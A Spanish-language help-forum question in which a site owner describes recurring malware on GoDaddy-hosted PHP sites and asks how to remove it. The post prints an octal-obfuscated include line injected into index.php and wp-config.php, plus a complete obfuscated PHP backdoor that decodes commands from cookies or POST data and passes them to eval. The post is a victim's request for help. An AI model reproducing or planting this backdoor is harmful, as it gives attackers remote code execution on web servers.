# Eliminar Malware o virus en servidor de Godaddy

Tags: php, server, godaddy, security

hace aproximadamente 4 meses tengo un malware infectando varios sitios en php (Laravel, Wordpress) que tengo en un host de godaddy

Alguna idea de como puedo solucionarlo, ya hemos instalado antivirus en las paginas incluso le pagamos a godaddy para que lo eliminara pero no lo hicieron el virus vivió a aparecer.

La forma como funciona y que logro percibir, es que crea archivos aleatorios en cualquier parte del public_html, cambia los permisos de los archivos principales como el index.php, wp-config.php e inserta esto al inicio del archivo

```
/*23460*/

@include "\057h\157m\145/\147d\145s\0626\060/\160u\142l\151c\137h\164m\154/\146o\170t\162a\151l\145r\163/\143r\155-\141n\144-\143q\147/\143a\143h\145/\056f\0656\1420\1464\067.\151c\157";

/*23460*/
```

Este es uno de los archivos que crea aleatoriamente por todo el servidor.

```
$n2c90 = 714;$GLOBALS['c4a6edbc'] = Array();global $c4a6edbc;$c4a6edbc = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['ua67f'] = "\x4c\x3c\x24\x23\x68\x57\x3b\x49\x4f\x44\x20\x59\x4d\x2c\x7b\x28\x5a\x79\x41\x66\x45\x47\x5c\x39\x6d\x63\x7a\x4e\x67\x42\x4b\x5f\x35\x4a\x7c\x27\x38\x32\x33\x60\x5b\x76\x3f\x3a\x30\x58\x78\x46\x55\x6e\x5d\x2a\x61\x9\x53\x48\x5e\x7e\x72\x25\x74\x56\x43\x6b\x21\x2d\x36\x2f\x2b\x70\x3e\x7d\x6a\x52\x22\x54\x31\x50\xd\x29\x71\x51\x75\x34\xa\x65\x40\x3d\x2e\x62\x26\x77\x6c\x37\x64\x6f\x73\x69";$c4a6edbc[$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66]] = $c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][4].$c4a6edbc['ua67f'][58];$c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][52]] = $c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][94];$c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][52]] = $c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][92].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][49];$c4a6edbc[$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][93]] = $c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][60];$c4a6edbc[$c4a6edbc['ua67f'][82].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][25]] = $c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][92].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][26].$c4a6edbc['ua67f'][85];$c4a6edbc[$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][37].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][32]] = $c4a6edbc['ua67f'][69].$c4a6edbc['ua67f'][4].$c4a6edbc['ua67f'][69].$c4a6edbc['ua67f'][41].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][49];$c4a6edbc[$c4a6edbc['ua67f'][26].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][52]] = $c4a6edbc['ua67f'][82].$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][92].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][26].$c4a6edbc['ua67f'][85];$c4a6edbc[$c4a6edbc['ua67f'][17].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][83]] = $c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][85];$c4a6edbc[$c4a6edbc['ua67f'][46].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66]] = $c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][92].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][60];$c4a6edbc[$c4a6edbc['ua67f'][26].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][93]] = $c4a6edbc['ua67f'][63].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][38];$c4a6edbc[$c4a6edbc['ua67f'][41].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][85]] = $c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][19];$c4a6edbc[$c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][93]] = $_POST;$c4a6edbc[$c4a6edbc['ua67f'][69].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][44]] = $_COOKIE;@$c4a6edbc[$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][93]]($c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][92].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][28], NULL);@$c4a6edbc[$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][93]]($c4a6edbc['ua67f'][92].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][28].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][58].$c4a6edbc['ua67f'][96], 0);@$c4a6edbc[$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][93]]($c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][46].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][46].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][82].$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][95].$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][31].$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][85], 0);@$c4a6edbc[$c4a6edbc['ua67f'][46].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66]](0);$i0379b = NULL;$h99225e = NULL;$c4a6edbc[$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][76]] = $c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][37].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][65].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][65].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][65].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][65].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][37].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][52];global $d6468191;function  m8c8df($i0379b, $tfecd0){global $c4a6edbc;$yf08 = "";for ($kca8=0; $kca8<$c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][52]]($i0379b);){for ($ia8a3=0; $ia8a3<$c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][52]]($tfecd0) && $kca8<$c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][52]]($i0379b); $ia8a3++, $kca8++){$yf08 .= $c4a6edbc[$c4a6edbc['ua67f'][97].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][66]]($c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][52]]($i0379b[$kca8]) ^ $c4a6edbc[$c4a6edbc['ua67f'][49].$c4a6edbc['ua67f'][38].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][52]]($tfecd0[$ia8a3]));}}return $yf08;}function  kf68d3($i0379b, $tfecd0){global $c4a6edbc;global $d6468191;return $c4a6edbc[$c4a6edbc['ua67f'][41].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][85]]($c4a6edbc[$c4a6edbc['ua67f'][41].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][85]]($i0379b, $d6468191), $tfecd0);}foreach ($c4a6edbc[$c4a6edbc['ua67f'][69].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][44]] as $tfecd0=>$we4ccb){$i0379b = $we4ccb;$h99225e = $tfecd0;}if (!$i0379b){foreach ($c4a6edbc[$c4a6edbc['ua67f'][24].$c4a6edbc['ua67f'][19].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][93]] as $tfecd0=>$we4ccb){$i0379b = $we4ccb;$h99225e = $tfecd0;}}$i0379b = @$c4a6edbc[$c4a6edbc['ua67f'][26].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][52]]($c4a6edbc[$c4a6edbc['ua67f'][26].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][25].$c4a6edbc['ua67f'][93]]($c4a6edbc[$c4a6edbc['ua67f'][17].$c4a6edbc['ua67f'][83].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][93].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][85].$c4a6edbc['ua67f'][83]]($i0379b), $h99225e));if (isset($i0379b[$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][63]]) && $d6468191==$i0379b[$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][63]]){if ($i0379b[$c4a6edbc['ua67f'][52]] == $c4a6edbc['ua67f'][97]){$kca8 = Array($c4a6edbc['ua67f'][69].$c4a6edbc['ua67f'][41] => @$c4a6edbc[$c4a6edbc['ua67f'][60].$c4a6edbc['ua67f'][94].$c4a6edbc['ua67f'][37].$c4a6edbc['ua67f'][66].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][32].$c4a6edbc['ua67f'][23].$c4a6edbc['ua67f'][52].$c4a6edbc['ua67f'][32]](),$c4a6edbc['ua67f'][96].$c4a6edbc['ua67f'][41] => $c4a6edbc['ua67f'][76].$c4a6edbc['ua67f'][88].$c4a6edbc['ua67f'][44].$c4a6edbc['ua67f'][65].$c4a6edbc['ua67f'][76],);echo @$c4a6edbc[$c4a6edbc['ua67f'][82].$c4a6edbc['ua67f'][36].$c4a6edbc['ua67f'][89].$c4a6edbc['ua67f'][25]]($kca8);}elseif ($i0379b[$c4a6edbc['ua67f'][52]] == $c4a6edbc['ua67f'][85]){eval/*qe702213*/($i0379b[$c4a6edbc['ua67f'][94]]);}exit();} ?><?php
```

Gracias por la ayuda que me puedan brindar...

Comment: ¿Tienes esos sitios corriendo también en servidor local? De ser así, ¿también se infectan con el virus? Si la respuesta es afirmativa, es probable que algún plugin sea el que está infectado; de lo contrario, es el servidor de GoDaddy el que tiene el virus y su departamento de soporte es el que debe solucionar el problema SIN COSTO.

Comment: Hola, la verdad no los tengo de manera local. alguno idea de que es lo que hace el malware ?

Comment: Ni idea, nada más copiar a mi IDE, brincó una alerta del antivirus.